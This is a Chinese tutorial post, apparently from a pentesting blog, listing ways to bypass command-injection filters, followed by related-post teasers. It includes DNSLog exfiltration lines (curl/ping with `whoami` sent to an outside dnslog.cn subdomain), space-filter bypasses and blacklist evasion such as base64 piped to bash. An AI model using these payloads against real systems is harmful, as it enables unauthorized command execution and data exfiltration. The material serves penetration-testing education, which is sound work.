命令执行的绕过Tip

管道符;顺序执行,命令之间没有逻辑关系正常顺序执行&&逻辑与; 当命令1正确执行后,才会执行命令2。否则命令2不会执行两个命令都会执行||逻辑或; 当命令1不正确执行后,命令2才会执行。否则命令2不会执行mi会执行whom其他特殊符号符号作用'单引号,在单引号中所有的特殊符号,如“$”和“`”(反引号)都无特殊含义'双引号,在双引号中特殊符号都无特殊含义,但“$”、“`”(反引号)和“\”是例外,拥有“调用变量值”,“引用命令”和“转义符”的特殊含义`反引号:反引号括起来的内容是系统命令,在Bash中先会执行它和()$()和反引号作用相同,用来引用系统命令#在shell脚本中,#开头的行代表注释$用于调用变量的值,如需要调用变量name的值时,需要用$name的方式得到\转义符,跟在\之后的特殊字符将失去特殊含义,变为普通字符DNSLog带出命令Linux:curl http://`whoami`.uvlmxy.dnslog.cnping `whoami`.uvlmxy.dnslog.cnWindows:ping %USERNAME%.uvlmxy.dnslog.cn绕过空格限制${IFS}root@mon-one:~/tmp/tmp# cat tmponehhnihaoroot@mon-one:~/tmp/tmp# cat${IFS}tmponehhnihao重定向符<>root@mon-one:~/tmp/tmp# cat<>tmponehhnihao{,}root@mon-one:~/tmp/tmp# {cat,tmp}onehhnihao使用环境变量COMMAND=$'\x20-al';ls$COMMAND绕过命令黑名单拼接root@mon-one:~/tmp/tmp# cat tmponehhnihaoroot@mon-one:~/tmp/tmp# a=ca;b=t;c=tmp;$a$b $conehhnihaobase64编码root@mon-one:~/tmp/tmp# `echo 'Y2F0IHRtcA=='|base64 -d`onehhnihaoroot@mon-one:~/tmp/tmp# echo 'Y2F0IHRtcA=='|base64 -d|bashonehhnihao单引号/双引号root@mon-one:~/tmp/tmp# ca''t tm''ponehhnihao反斜线\root@mon-one:~/tmp/tmp# c\at tmponehhnihao$@绕过who$@ami如果觉得有用,感谢师傅给个赞支持下渗透测试教程分享渗透测试、黑客入门

(0)

相关推荐

  • Stata:CHFS中国家庭金融调查数据库清洗和处理

    New! lianxh 命令发布了:   GIF 动图介绍 随时搜索 Stata 推文.教程.手册.论坛,安装命令如下:   . ssc install lianxh 作者: 李青塬 (广东工业大学) ...

  • 002. Linux基础二 (命令行/括号拓展、TAB、history)

    002. Linux基础二 (命令行/括号拓展、TAB、history)

  • Shell命令提示符及颜色

    root@localhost ~ # echo $PS1 //该条指令的PS1是Linux终端用户的一个环境变量,用来说明命令行提示符的设置.//输出结果PS1='[\u@\h \W]$'123 li ...

  • linux中ACL权限

    linux中ACL权限

  • linux中文件系统属性chattr权限

    一.chattr命令格式 格式 chattr [+-=][选项] 文件或目录名 操作 +: 增加权限-: 删除权限=: 等于某权限 选项 i: 如果对文件设置i属性,那么不允许对文件进行删除/改名,也 ...

  • CTF中的命令执行绕过

    在介绍命令注入之前,有一点需要注意:命令注入与远程代码执行不同.他们的区别在于,远程代码执行实际上是调用服务器网站代码进行执行,而命令注入则是调用操作系统命令进行执行. 作为CTF最基础的操作,命令执 ...

  • 使用命名管道通讯的命令执行工具

    管道简述 管道并不是什么新鲜事物,它是一项古老的技术,可以在很多操作系统(Unix.Linux.Windows 等)中找到,其本质是是用于进程间通信的共享内存区域,确切的的说应该是线程间的通信方法(I ...

  • 命令执行写webshell总结

    前言 当我们找到一个rce漏洞却无法反弹shell时,在web路径写webshell用连接工具进行管理会方便的多,本文总结从命令执行到webshell的流程化操作. 寻找web路径 写webshell ...

  • Bash脚本编程学习笔记01:变量与多命令执行

    变量基础知识 程序由指令加数据所组成,而变量可以理解为数据来源的一种. 变量名可以理解为指向了某个内存空间的地址,对于变量的赋值可理解为向内存空间写入数据,对于变量的引用可理解为从内存空间读取数据. ...

  • git源码泄露,命令执行,传递参数闭合strpos函数

    CSAW CTF 2016 Quals: mfw [实验原理] git源码泄露,命令执行 [实验目的] 了解git源码泄露的处理方法 [实验环境] Windows [实验工具] firefox [实验 ...

  • [web安全]命令执行&&代码执行 wafpass总结

    命令执行&&代码执行 wafpass总结 代码执行 php常见命令执行函数 php代码 eval() assert() preg_replace call_user_func() ca ...

  • 【漏洞预警】天融信关于Redis数据库远程命令执行漏洞的预警

    0x00背景介绍 Redis是一个开源的使用ANSI C语言编写.支持网络.可基于内存亦可持久化的日志型.Key-Value数据库,并提供多种语言的API.作为一个高性能的key-value数据库,R ...

  • perl脚本中GET命令执行漏洞([HITCON 2017]SSRFme)

    GET命令执行漏洞 思路来自于HITCON2017中的ssrfme,考点是GET的任意命令执行.代码很简单,调用命令GET来执行从url获取的参数, 然后按照filename新建文件,写入GET的结果 ...

  • 内网渗透之域渗透命令执行总结

    前言 AD的全称是Active Directory:活动目录 域(Domain)是Windows网络中独立运行的单位,域之间相互访问则需要建立信任关系(即Trust Relation).信任关系是连接 ...